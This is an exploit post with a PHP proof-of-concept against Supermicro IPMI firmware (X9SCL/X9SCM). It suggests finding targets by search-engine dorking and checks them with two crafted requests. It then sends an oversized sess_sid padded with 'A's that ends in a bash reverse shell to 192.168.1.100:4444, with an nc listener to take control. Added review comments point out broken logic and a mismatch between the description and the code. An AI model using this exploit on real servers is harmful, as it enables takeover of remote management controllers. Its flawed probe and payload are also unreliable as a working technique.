============================================================================================================================================= | # Title : Supermicro Onboard IPMI X9SCL X9SCM with firmware SMT_X9_214 PHP Buffer Overflow | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://www.supermicro.com | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: This code is an exploit written in PHP, used to test and exploit the Buffer Overflow vulnerability in the Supermicro IPMI interface. If the target is vulnerable to the attack (500 Internal Server Error), a Reverse Shell payload is sent to open a control shell on the target machine. [+] What's going on here? The target-ip and attacker (192.168.1.100:4444) are specified. Checks if the target is vulnerable (checkVulnerability()). If vulnerable, the Reverse Shell payload is sent. [+] Code Summary 1 Sends an initial request to check for vulnerability. 2 If the response is 500, a reverse connection command is sent via User-Agent. 3️ Once the command reaches the victim device, a connection is opened to the attacker. 4️ The attacker can now take full control of the device via nc -lvnp 4444. [+] save code as poc.php. [+] Set Target : line 80 // target ip 81 // Put your IP address 82 // // Set the port you are listening on. [+] USage : php poc.php [+] PayLoad :
// NOTE(review): the `<?php` tag, the `class SupermicroExploit` header and the
// constructor signature are missing from this copy (most likely eaten by the
// extraction). The fragment below is the tail of the constructor: it stores the
// base URL with any trailing slash removed, plus the listener address and port.
target_url = rtrim($url, '/'); $this->attacker_ip = $ip; $this->attacker_port = $port; }

    /**
     * POSTs a `sess_sid` value to /cgi/close_window.cgi with a User-Agent made
     * of a 16-character random prefix followed by $agent.
     *
     * @param string      $sess  value sent as the sess_sid form field
     * @param string|null $agent suffix appended to the User-Agent; a random
     *                           8-character string when omitted
     * @return string|false response body, or false if the request failed
     */
    public function sendCloseWindowRequest($sess, $agent = null) {
        // `!$agent` is a truthiness test, so "" and "0" are replaced as well as null.
        if (!$agent) {
            $agent = $this->randomString(8);
        }
        $headers = [
            "User-Agent: " . $this->randomString(16) . $agent
        ];
        $data = [
            'sess_sid' => $sess
        ];
        return $this->sendPostRequest("/cgi/close_window.cgi", $data, $headers);
    }

    /**
     * Sends a form-encoded POST to $path under the target base URL via the
     * http:// stream wrapper.
     *
     * @param string   $path    path appended to the base URL
     * @param array    $data    form fields, encoded with http_build_query()
     * @param string[] $headers extra request headers, one per element
     * @return string|false response body, or false on failure
     */
    private function sendPostRequest($path, $data, $headers = []) {
        $url = $this->target_url . $path;
        $options = [
            'http' => [
                'header' => implode("\r\n", $headers) . "\r\nContent-type: application/x-www-form-urlencoded",
                'method' => 'POST',
                'content' => http_build_query($data),
            ]
        ];
        // NOTE(review): neither 'ignore_errors' nor 'timeout' is set on the
        // context. Without ignore_errors the http wrapper returns false (and
        // emits a warning) for a 4xx/5xx status instead of handing back the
        // body, which matters for the "500" substring test in
        // checkVulnerability() — confirm on the PHP version in use.
        $context = stream_context_create($options);
        return file_get_contents($url, false, $context);
    }

    /**
     * Two-request probe: a 20-byte sess_sid must yield a body containing
     * "Can't find action" (baseline), then a 132-byte sess_sid is sent and
     * "500" is looked for in whatever comes back.
     *
     * @return string "Unknown", "Safe" or "Vulnerable"
     */
    public function checkVulnerability() {
        $safe_check = $this->randomString(20);
        $trigger_check = $this->randomString(132);
        // Baseline: a normal-length unknown session should be rejected with
        // the expected message; anything else means we cannot interpret the
        // second response.
        $res = $this->sendCloseWindowRequest($safe_check);
        if (!$res || strpos($res, "Can't find action") === false) {
            return "Unknown";
        }
        $res = $this->sendCloseWindowRequest($trigger_check);
        // This matches "500" anywhere in the body, not the HTTP status line:
        // any body that happens to contain "500" is reported as Vulnerable,
        // while a genuine 500 for which file_get_contents() returned false
        // falls into the "Safe" branch.
        if (!$res || strpos($res, "500") === false) {
            return "Safe";
        }
        return "Vulnerable";
    }

    /**
     * Returns $length letters drawn from a shuffled repetition of the ASCII
     * alphabet. Not cryptographic (str_shuffle); only used to vary probe values.
     *
     * @param int $length
     * @return string
     */
    private function randomString($length) {
        // substr() starts at offset 1, so one character fewer than the pool is
        // available: when $length is an exact multiple of 52 the result is one
        // character short of $length.
        return substr(str_shuffle(str_repeat($x='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ', ceil($length/strlen($x)))), 1, $length);
    }

    /**
     * Sends the padded buffer from generatePayload() as the sess_sid value.
     * The request's return value is discarded, so success is never checked.
     */
    public function exploit() {
        echo "Target is vulnerable! Sending reverse shell...\n";
        $buffer = $this->generatePayload();
        // The buffer travels in the sess_sid form field, not in the User-Agent
        // header as the description above states.
        $this->sendCloseWindowRequest($buffer);
    }

    /**
     * Builds an 8000-byte sess_sid value: "A" padding followed by the command
     * string that references attacker_ip:attacker_port.
     *
     * Detection note: an ~8000-byte sess_sid POSTed to /cgi/close_window.cgi,
     * together with the random-prefix User-Agent built above, is a simple
     * signature for this PoC in the BMC's HTTP logs or on a reverse proxy.
     *
     * @return string
     */
    private function generatePayload() {
        $payload = "bash -i >& /dev/tcp/{$this->attacker_ip}/{$this->attacker_port} 0>&1";
        // strlen() is byte length here; the total is kept at exactly 8000 bytes.
        return str_repeat("A", 8000 - strlen($payload)) . $payload;
    }
}

// Script entry: configure target and listener, probe, and only send the
// payload on a "Vulnerable" verdict. The text above refers to "line 80-82"
// for these settings; in this collapsed copy they are the three assignments
// below.
$target_ip = "http://target-ip";
$attacker_ip = "192.168.1.100";
$attacker_port = "4444"; // kept as a string; interpolated into the command as-is
$exploit = new SupermicroExploit($target_ip, $attacker_ip, $attacker_port);
$status = $exploit->checkVulnerability();
echo "Target is: $status\n";
if ($status === "Vulnerable") {
    $exploit->exploit();
}
 Greetings to :===================================================================================== jericho * Larry W. 
Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================